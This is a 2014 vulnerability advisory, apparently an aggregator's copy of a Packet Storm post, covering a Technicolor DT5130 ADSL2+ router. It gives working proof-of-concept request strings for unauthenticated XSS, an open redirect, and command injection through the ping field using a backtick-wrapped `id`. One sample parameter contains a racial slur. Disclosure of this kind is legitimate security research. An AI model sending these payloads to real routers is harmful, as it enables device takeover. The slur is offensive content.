ADSL2+ 2.05.C29GV XSS / URL Redirect / Command Injection

🗓️ 03 Dec 2014 00:00:00Reported by Ewerson GuimaraesType

packetstorm🔗 packetstormsecurity.com👁 48 Views

Wireless N ADSL2+ Modem Router with Firmware V2.05.C29GV vulnerable to XSS, URL Redirect, and Command Injectio

Reporter	Title	Published	Views	Family All 21
0day.today	Technicolor DT5130 V2.05.C29GV - Multiple Vulnerabilities	4 Dec 201400:00	–	zdt
Check Point Advisories	Technicolor DT5130 Router Command Injection (CVE-2014-9144)	21 Dec 201400:00	–	checkpoint_advisories
CVE	CVE-2014-9142	5 Dec 201415:00	–	cve
CVE	CVE-2014-9143	5 Dec 201415:00	–	cve
CVE	CVE-2014-9144	5 Dec 201415:00	–	cve
Cvelist	CVE-2014-9142	5 Dec 201415:00	–	cvelist
Cvelist	CVE-2014-9143	5 Dec 201415:00	–	cvelist
Cvelist	CVE-2014-9144	5 Dec 201415:00	–	cvelist
Exploit DB	Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities	4 Dec 201400:00	–	exploitdb
EUVD	EUVD-2014-8967	7 Oct 202500:30	–	euvd

`Product: Wireless N ADSL 2/2+ Modem Router  
Firmware Version : V2.05.C29GV  
Modem Type : ADSL2+ Router  
Modem Vendor : Technicolor  
Model: DT5130  
  
Bugs:  
1- Unauth Xss - CVE-2014-9142  
user=teste&password=teste&  
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login  
  
2- Arbitrari URL redirect - CVE-2014-9143  
failrefer=http://blog.dclabs.com.br&login=Login&password=  
pass&refer=/index.html&user=1&userlevel=15  
  
3- Command Injection in ping field - CVE-2014-9144  
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE  
  
  
--   
Ewerson Guimaraes (Crash)  
Pentester/Researcher  
DcLabs / Ibliss Security Team  
www.dclabs.com.br / www.ibliss.com.br  
`

03 Dec 2014 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.08916